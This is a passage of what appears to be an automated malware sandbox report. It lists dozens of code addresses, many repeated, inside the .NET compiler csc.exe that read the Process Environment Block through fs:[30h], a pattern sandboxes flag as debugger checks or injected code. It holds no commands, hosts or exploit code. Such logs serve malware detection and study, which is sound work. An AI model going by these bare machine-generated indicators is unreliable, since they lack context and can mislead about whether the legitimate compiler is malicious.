Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A3547F mov eax, dword ptr fs:[00000030h] 6_2_05A3547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h] 6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1F453 mov eax, dword ptr fs:[00000030h] 6_2_05A1F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h] 6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h] 6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EC460 mov ecx, dword ptr fs:[00000030h] 6_2_059EC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A337B6 mov eax, dword ptr fs:[00000030h] 6_2_05A337B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598D7B0 mov eax, dword ptr fs:[00000030h] 6_2_0598D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1F78A mov eax, dword ptr fs:[00000030h] 6_2_05A1F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h] 6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h] 6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E97A9 mov eax, dword ptr fs:[00000030h] 6_2_059E97A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059607AF mov eax, dword ptr fs:[00000030h] 6_2_059607AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596C7C0 mov eax, dword ptr fs:[00000030h] 6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h] 6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E07C3 mov eax, dword ptr fs:[00000030h] 6_2_059E07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h] 6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h] 6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596D7E0 mov ecx, dword ptr fs:[00000030h] 6_2_0596D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EE7E1 mov eax, dword ptr fs:[00000030h] 6_2_059EE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05960710 mov eax, dword ptr fs:[00000030h] 6_2_05960710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h] 6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A2972B mov eax, dword ptr fs:[00000030h] 6_2_05A2972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05990710 mov eax, dword ptr fs:[00000030h] 6_2_05990710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1F72E mov eax, dword ptr fs:[00000030h] 6_2_05A1F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h] 6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05967703 mov eax, dword ptr fs:[00000030h] 6_2_05967703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599C700 mov eax, dword ptr fs:[00000030h] 6_2_0599C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h] 6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h] 6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599273C mov ecx, dword ptr fs:[00000030h] 6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h] 6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h] 6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DC730 mov eax, dword ptr fs:[00000030h] 6_2_059DC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05995734 mov eax, dword ptr fs:[00000030h] 6_2_05995734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05963720 mov eax, dword ptr fs:[00000030h] 6_2_05963720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h] 6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h] 6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059EE75D mov eax, dword ptr fs:[00000030h] 6_2_059EE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05960750 mov eax, dword ptr fs:[00000030h] 6_2_05960750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h] 6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E4755 mov eax, dword ptr fs:[00000030h] 6_2_059E4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599674D mov esi, dword ptr fs:[00000030h] 6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h] 6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h] 6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05968770 mov eax, dword ptr fs:[00000030h] 6_2_05968770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h] 6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A33749 mov eax, dword ptr fs:[00000030h] 6_2_05A33749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B765 mov eax, dword ptr fs:[00000030h] 6_2_0595B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05964690 mov eax, dword ptr fs:[00000030h] 6_2_05964690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E368C mov eax, dword ptr fs:[00000030h] 6_2_059E368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059576B2 mov eax, dword ptr fs:[00000030h] 6_2_059576B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059966B0 mov eax, dword ptr fs:[00000030h] 6_2_059966B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595D6AA mov eax, dword ptr fs:[00000030h] 6_2_0595D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599C6A6 mov eax, dword ptr fs:[00000030h] 6_2_0599C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1D6F0 mov eax, dword ptr fs:[00000030h] 6_2_05A1D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596B6C0 mov eax, dword ptr fs:[00000030h] 6_2_0596B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059916CF mov eax, dword ptr fs:[00000030h] 6_2_059916CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599A6C7 mov ebx, dword ptr fs:[00000030h] 6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599A6C7 mov eax, dword ptr fs:[00000030h] 6_2_0599A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1F6C7 mov eax, dword ptr fs:[00000030h] 6_2_05A1F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A216CC mov eax, dword ptr fs:[00000030h] 6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E06F1 mov eax, dword ptr fs:[00000030h] 6_2_059E06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE6F2 mov eax, dword ptr fs:[00000030h] 6_2_059DE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F36EE mov eax, dword ptr fs:[00000030h] 6_2_059F36EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059936EF mov eax, dword ptr fs:[00000030h] 6_2_059936EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598D6E0 mov eax, dword ptr fs:[00000030h] 6_2_0598D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05963616 mov eax, dword ptr fs:[00000030h] 6_2_05963616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A2619 mov eax, dword ptr fs:[00000030h] 6_2_059A2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE609 mov eax, dword ptr fs:[00000030h] 6_2_059DE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A35636 mov eax, dword ptr fs:[00000030h] 6_2_05A35636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599F603 mov eax, dword ptr fs:[00000030h] 6_2_0599F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597260B mov eax, dword ptr fs:[00000030h] 6_2_0597260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05991607 mov eax, dword ptr fs:[00000030h] 6_2_05991607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597E627 mov eax, dword ptr fs:[00000030h] 6_2_0597E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F626 mov eax, dword ptr fs:[00000030h] 6_2_0595F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05996620 mov eax, dword ptr fs:[00000030h] 6_2_05996620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05998620 mov eax, dword ptr fs:[00000030h] 6_2_05998620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596262C mov eax, dword ptr fs:[00000030h] 6_2_0596262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A2866E mov eax, dword ptr fs:[00000030h] 6_2_05A2866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597C640 mov eax, dword ptr fs:[00000030h] 6_2_0597C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05992674 mov eax, dword ptr fs:[00000030h] 6_2_05992674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599A660 mov eax, dword ptr fs:[00000030h] 6_2_0599A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05999660 mov eax, dword ptr fs:[00000030h] 6_2_05999660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059FD660 mov eax, dword ptr fs:[00000030h] 6_2_059FD660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059E019F mov eax, dword ptr fs:[00000030h] 6_2_059E019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h] 6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h] 6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595A197 mov eax, dword ptr fs:[00000030h] 6_2_0595A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h] 6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h] 6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h] 6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h] 6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059B7190 mov eax, dword ptr fs:[00000030h] 6_2_059B7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059A0185 mov eax, dword ptr fs:[00000030h] 6_2_059A0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0597B1B0 mov eax, dword ptr fs:[00000030h] 6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h] 6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h] 6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A361E5 mov eax, dword ptr fs:[00000030h] 6_2_05A361E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599D1D0 mov eax, dword ptr fs:[00000030h] 6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599D1D0 mov ecx, dword ptr fs:[00000030h] 6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h] 6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h] 6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE1D0 mov ecx, dword ptr fs:[00000030h] 6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h] 6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h] 6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A071F9 mov esi, dword ptr fs:[00000030h] 6_2_05A071F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h] 6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h] 6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059901F8 mov eax, dword ptr fs:[00000030h] 6_2_059901F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A351CB mov eax, dword ptr fs:[00000030h] 6_2_05A351CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h] 6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059651ED mov eax, dword ptr fs:[00000030h] 6_2_059651ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h] 6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h] 6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h] 6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h] 6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h] 6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h] 6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A20115 mov eax, dword ptr fs:[00000030h] 6_2_05A20115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0A118 mov ecx, dword ptr fs:[00000030h] 6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h] 6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h] 6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h] 6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05990124 mov eax, dword ptr fs:[00000030h] 6_2_05990124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h] 6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h] 6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595C156 mov eax, dword ptr fs:[00000030h] 6_2_0595C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05967152 mov eax, dword ptr fs:[00000030h] 6_2_05967152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F8158 mov eax, dword ptr fs:[00000030h] 6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h] 6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h] 6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F4144 mov ecx, dword ptr fs:[00000030h] 6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h] 6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h] 6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h] 6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h] 6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h] 6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h] 6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h] 6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h] 6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h] 6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F9179 mov eax, dword ptr fs:[00000030h] 6_2_059F9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h] 6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A35152 mov eax, dword ptr fs:[00000030h] 6_2_05A35152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05965096 mov eax, dword ptr fs:[00000030h] 6_2_05965096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0599909C mov eax, dword ptr fs:[00000030h] 6_2_0599909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h] 6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h] 6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0595D08D mov eax, dword ptr fs:[00000030h] 6_2_0595D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A260B8 mov eax, dword ptr fs:[00000030h] 6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_05A260B8 mov ecx, dword ptr fs:[00000030h] 6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_0596208A mov eax, dword ptr fs:[00000030h] 6_2_0596208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h] 6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h] 6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Code function: 6_2_059F80A8 mov eax, dword ptr fs:[00000030h] 6_2_059F80A8
